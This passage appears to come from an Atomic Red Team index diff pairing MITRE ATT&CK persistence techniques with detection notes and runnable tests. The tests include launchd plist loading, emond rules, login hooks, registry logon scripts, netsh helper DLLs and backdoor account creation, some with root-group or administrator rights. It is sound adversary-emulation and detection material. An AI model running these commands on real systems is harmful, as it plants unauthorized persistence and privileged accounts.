+ These launch agents have property list files which point to the executables + that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install + a new launch agent that can be configured to execute at login by using launchd + or launchctl to load a plist into the appropriate directories (Citation: + Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The + agent name may be disguised by using a name from a related operating system + or benign software. Launch Agents are created with user level privileges and + are executed with the privileges of the user when they log in (Citation: OSX + Malware Detection) (Citation: OceanLotus for OS X). They can be set up to + execute when a specific user logs in (in the specific user’s directory structure) + or when any user logs in (which requires administrator privileges)." + id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T22:11:45.513Z' + created: '2020-01-17T16:10:58.592Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_detection: Monitor Launch Agent creation through additional plist files + and utilities such as Objective-See’s KnockKnock application. Launch Agents + also require files on disk for persistence which can also be monitored via + other file monitoring applications. 
+ x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_platforms: + - macOS + identifier: T1543.001 + atomic_tests: + - name: Launch Agent + auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + description: 'Create a plist and execute it + +' + supported_platforms: + - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_malicious_plist}) + +' + prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; + exit 1; + +' + executor: + name: bash + elevation_required: true + command: | + if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; + sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} + sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} + cleanup: | + sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} + sudo rm ~/Library/LaunchAgents/#{plist_filename} + T1543.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543.004 + url: https://attack.mitre.org/techniques/T1543/004 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. 
+ source_name: AppleDocs Launch Agent Daemons + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + - url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf + description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. + Retrieved July 10, 2017.' + source_name: WireLurker + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launch Daemon + description: "Adversaries may create or modify launch daemons to repeatedly + execute malicious payloads as part of persistence. Per Apple’s developer documentation, + when macOS and OS X boot up, launchd is run to finish system initialization. + This process loads the parameters for each launch-on-demand system-level daemon + from the property list (plist) files found in /System/Library/LaunchDaemons + and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent + Daemons). These LaunchDaemons have property list files which point to the + executables that will be launched (Citation: Methods of Mac Malware Persistence). + \n\nAdversaries may install a new launch daemon that can be configured to + execute at startup by using launchd or launchctl to load a plist into the + appropriate directories (Citation: OSX Malware Detection). The daemon name + may be disguised by using a name from a related operating system or benign + software (Citation: WireLurker). 
Launch Daemons may be created with administrator + privileges, but are executed under root privileges, so an adversary may also + use a service to escalate privileges from administrator to root. \n\nThe plist + file permissions must be root:wheel, but the script or program that it points + to has no such requirement. So, it is possible for poor configurations to + allow an adversary to modify a current Launch Daemon’s executable and gain + persistence or Privilege Escalation. " + id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-09-16T15:46:44.130Z' + created: '2020-01-17T19:23:15.227Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - root + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Monitor for launch daemon creation or modification through + plist files and utilities such as Objective-See''s KnockKnock application. 
' + x_mitre_platforms: + - macOS + identifier: T1543.004 + atomic_tests: + - name: Launch Daemon + auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + description: 'Utilize LaunchDaemon to launch `Hello World` + +' + supported_platforms: + - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_malicious_plist}) + +' + prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and + try again."; exit 1; + +' + executor: + name: bash + elevation_required: true + command: | + sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} + sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} + cleanup: | + sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} + sudo rm /Library/LaunchDaemons/#{plist_filename} + T1053.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.004 + url: https://attack.mitre.org/techniques/T1053/004 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. 
+ source_name: Methods of Mac Malware Persistence + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launchd + description: |- + Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). + + An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in. + id: attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T22:41:14.739Z' + created: '2019-12-03T14:15:27.452Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: false + x_mitre_permissions_required: + - root + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. 
Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement." + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - macOS + identifier: T1053.004 + atomic_tests: + - name: Event Monitor Daemon Persistence + auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e + description: "This test adds persistence via a plist to execute via the macOS + Event Monitor Daemon. \n" + supported_platforms: + - macos + input_arguments: + script_location: + description: evil plist location + type: path + default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" + script_destination: + description: Path where to move the evil plist + type: path + default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist" + empty_file: + description: Random name of the empty file used to trigger emond service + type: string + default: randomflag + executor: + name: bash + elevation_required: true + command: | + sudo cp #{script_location} #{script_destination} + sudo touch /private/var/db/emondClients/#{empty_file} + cleanup_command: | + sudo rm #{script_destination} + sudo rm /private/var/db/emondClients/#{empty_file} + T1136.001: + technique: + created: '2020-01-28T13:50:22.506Z' + modified: '2020-03-23T18:04:20.780Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--635cbe30-392d-4e27-978e-66774357c762 + description: |- 
+ Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. + + Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. + name: Local Account + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1136.001 + url: https://attack.mitre.org/techniques/T1136/001 + - source_name: Microsoft User Creation Event + description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account + was created. Retrieved June 30, 2017.' + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'User Account: User Account Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: 'Monitor for processes and command-line parameters associated + with local account creation, such as net user /add or useradd. + Collect data on account creation within a network. Event ID 4720 is generated + when a user account is created on a Windows system. (Citation: Microsoft User + Creation Event) Perform regular audits of local system accounts to detect + suspicious accounts that may have been created by an adversary.' 
+ x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1136.001 + atomic_tests: + - name: Create a user account on a Linux system + auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 + description: 'Create a user via useradd + +' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: String + default: evil_user + executor: + command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} + +' + cleanup_command: 'userdel #{username} + +' + name: bash + elevation_required: true + - name: Create a user account on a MacOS system + auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' + description: 'Creates a user on a MacOS system with dscl + +' + supported_platforms: + - macos + input_arguments: + username: + description: Username of the user to create + type: String + default: evil_user + realname: + description: "'realname' to record when creating the user" + type: String + default: Evil Account + executor: + command: | + dscl . -create /Users/#{username} + dscl . -create /Users/#{username} UserShell /bin/zsh + dscl . -create /Users/#{username} RealName "#{realname}" + dscl . -create /Users/#{username} UniqueID "1010" + dscl . -create /Users/#{username} PrimaryGroupID 80 + dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} + cleanup_command: 'dscl . -delete /Users/#{username} + +' + name: bash + elevation_required: true + - name: Create a new user in a command prompt + auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f + description: | + Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. 
To verify the + new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: T1136.001_CMD + password: + description: Password of the user to create + type: String + default: T1136.001_CMD! + executor: + command: 'net user /add "#{username}" "#{password}" + +' + cleanup_command: 'net user /del "#{username}" >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Create a new user in PowerShell + auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde + description: | + Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the + new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: T1136.001_PowerShell + executor: + command: 'New-LocalUser -Name "#{username}" -NoPassword + +' + cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore + +' + name: powershell + elevation_required: true + - name: Create a new user in Linux with `root` UID and GID. + auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c + description: 'Creates a new user in Linux and adds the user to the `root` group. + This technique was used by adversaries during the Butter attack campaign. 
+ +' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: String + default: butter + password: + description: Password of the user to create + type: String + default: BetterWithButter + executor: + command: | + useradd -g 0 -M -d /root -s /bin/bash #{username} + if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; + cleanup_command: 'userdel #{username} + +' + name: bash + elevation_required: true + - name: Create a new Windows admin user + auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 + description: 'Creates a new admin user in a command prompt. + +' + supported_platforms: + - windows + input_arguments: + username: + description: Username of the user to create + type: String + default: T1136.001_Admin + password: + description: Password of the user to create + type: String + default: T1136_pass + executor: + command: | + net user /add "#{username}" "#{password}" + net localgroup administrators "#{username}" /add + cleanup_command: 'net user /del "#{username}" >nul 2>&1 + +' + name: command_prompt + elevation_required: true + T1078.003: + technique: + id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 + description: "Adversaries may obtain and abuse credentials of a local account + as a means of gaining Initial Access, Persistence, Privilege Escalation, or + Defense Evasion. Local accounts are those configured by an organization for + use by users, remote support, services, or for administration on a single + system or service.\n\nLocal Accounts may also be abused to elevate privileges + and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). + Password reuse may allow the abuse of local accounts across a set of machines + on a network for the purposes of Privilege Escalation and Lateral Movement. 
" + name: Local Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.003 + url: https://attack.mitre.org/techniques/T1078/003 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-05T12:51:00.663Z' + created: '2020-03-13T20:26:46.695Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + - Containers + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Perform regular audits of local system accounts to detect + accounts that may have been created by an adversary for persistence. Look + for suspicious account behavior, such as accounts logged in at odd times or + outside of business hours. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1078.003 + atomic_tests: + - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + description: After execution the new account will be active and added to the + Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! 
+ net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true + T1037.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1037.002 + url: https://attack.mitre.org/techniques/T1037/002 + - url: https://support.apple.com/de-at/HT2420 + description: 'Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved + July 17, 2017.' + source_name: creating login hook + - source_name: S1 macOs Persistence + url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ + description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved + March 27, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Logon Script (Mac) + description: "Adversaries may use macOS logon scripts automatically executed + at logon initialization to establish persistence. macOS allows logon scripts + (known as login hooks) to be executed whenever a specific user logs into a + system. A login hook tells Mac OS X to execute a certain script when a user + logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), + a login hook executes as the elevated root user.(Citation: creating login + hook)\n\nAdversaries may use these login hooks to maintain persistence on + a single system.(Citation: S1 macOs Persistence) Access to login hook scripts + may allow an adversary to insert additional malicious code. There can only + be one login hook at a time though and depending on the access configuration + of the hooks, either local credentials or an administrator account may be + necessary. 
" + id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-27T16:49:15.786Z' + created: '2020-01-10T16:01:15.995Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_platforms: + - macOS + identifier: T1037.002 + atomic_tests: + - name: Logon Scripts - Mac + auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 + description: 'Mac logon script + +' + supported_platforms: + - macos + executor: + steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. + Populate the plist with the location of your shell script\n\n sudo defaults + write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. + Create the required plist file in the target user's Preferences directory\n\n\t + \ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. + Populate the plist with the location of your shell script\n\n\t defaults + write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" + name: manual + T1037.001: + technique: + id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3 + description: "Adversaries may use Windows logon scripts automatically executed + at logon initialization to establish persistence. 
Windows allows logon scripts + to be run whenever a specific user or group of users log into a system.(Citation: + TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript + Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these + scripts to maintain persistence on a single system. Depending on the access + configuration of the logon scripts, either local credentials or an administrator + account may be necessary. " + name: Logon Script (Windows) + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.001 + url: https://attack.mitre.org/techniques/T1037/001 + - url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx + description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved + April 27, 2016. + source_name: TechNet Logon Scripts + - source_name: Hexacorn Logon Scripts + url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ + description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part + 18. Retrieved November 15, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:45:03.153Z' + created: '2020-01-10T03:43:37.211Z' + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript. + + Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. 
+ x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1037.001 + atomic_tests: + - name: Logon Scripts + auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 + description: | + Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key + that can be viewed in the Registry Editor. + supported_platforms: + - windows + input_arguments: + script_path: + description: Path to .bat file + type: String + default: "%temp%\\art.bat" + script_command: + description: Command To Execute + type: String + default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt + executor: + command: | + echo "#{script_command}" > #{script_path} + REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f + cleanup_command: | + REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 + del #{script_path} >nul 2>&1 + del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 + name: command_prompt + T1556: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556 + url: https://attack.mitre.org/techniques/T1556 + - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/ + description: Bialek, J. (2013, September 15). Intercepting Password Changes + With Function Hooking. Retrieved November 21, 2017. + source_name: Clymb3r Function Hook Passwords Sept 2013 + - source_name: Dell Skeleton + description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. + Retrieved April 8, 2019. + url: https://www.secureworks.com/research/skeleton-key-malware-analysis + - source_name: Xorrior Authorization Plugins + url: https://xorrior.com/persistent-credential-theft/ + description: Chris Ross. (2018, October 17). Persistent Credential Theft with + Authorization Plugins. Retrieved April 22, 2021. 
+ - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Modify Authentication Process + description: |- + Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). + + Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. 
+ id: attack-pattern--f4c1826f-a322-41cd-9557-562100848c84 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-26T20:08:31.712Z' + created: '2020-02-11T19:01:56.887Z' + x_mitre_contributors: + - Chris Ross @xorrior + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain + controller and/or local computer. Monitor for changes to Registry entries + for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification + Packages) and correlate then investigate the DLL files these files + reference. \n\nPassword filters will also show up as an autorun and loaded + DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor + for calls to OpenProcess that can be used to manipulate lsass.exe + running on a domain controller as well as for malicious modifications to functions + exported from authentication-related system DLLs (such as cryptdll.dll and + samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module + paths (ex: /etc/pam.d/) for changes. Use system-integrity tools + such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor + for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: + Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity + audit policies across the enterprise and with externally accessible services. 
+ (Citation: TechNet Audit Policy) Look for suspicious account behavior across + systems that share accounts, either user, admin, or service accounts. Examples: + one account logged into multiple systems simultaneously; multiple accounts + logged into the same machine simultaneously; accounts logged in at odd times + or outside of business hours. Activity may be from interactive login sessions + or process ownership from accounts being used to execute binaries on a remote + system as a particular account. Correlate other security systems with login + information (e.g., a user has an active login session but has not entered + the building or does not have VPN access)." + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + - Linux + - macOS + - Network + atomic_tests: [] + T1546.007: + technique: + created: '2020-01-24T14:26:51.207Z' + modified: '2020-03-24T18:28:07.793Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed + description: |- + Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. + + Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. 
This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) + name: Netsh Helper DLL + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.007 + url: https://attack.mitre.org/techniques/T1546/007 + - url: https://technet.microsoft.com/library/bb490939.aspx + description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. + source_name: TechNet Netsh + - url: https://github.com/outflankbv/NetshHelperBeacon + description: Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved + February 13, 2017. + source_name: Github Netsh Helper CS Beacon + - url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html + description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL + DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. + source_name: Demaske Netsh Persistence + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes + in most environments. Monitor process executions and investigate any child + processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh + registry key for any new or suspicious entries that do not correlate with + known system files or benign software. 
(Citation: Demaske Netsh Persistence)' + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1546.007 + atomic_tests: + - name: Netsh Helper DLL Registration + auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d + description: 'Netsh interacts with other operating system components using dynamic-link + library (DLL) files + +' + supported_platforms: + - windows + input_arguments: + helper_file: + description: Path to DLL + type: Path + default: C:\Path\file.dll + executor: + command: 'netsh.exe add helper #{helper_file} + +' + name: command_prompt + T1556.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.004 + url: https://attack.mitre.org/techniques/T1556/004 + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. 
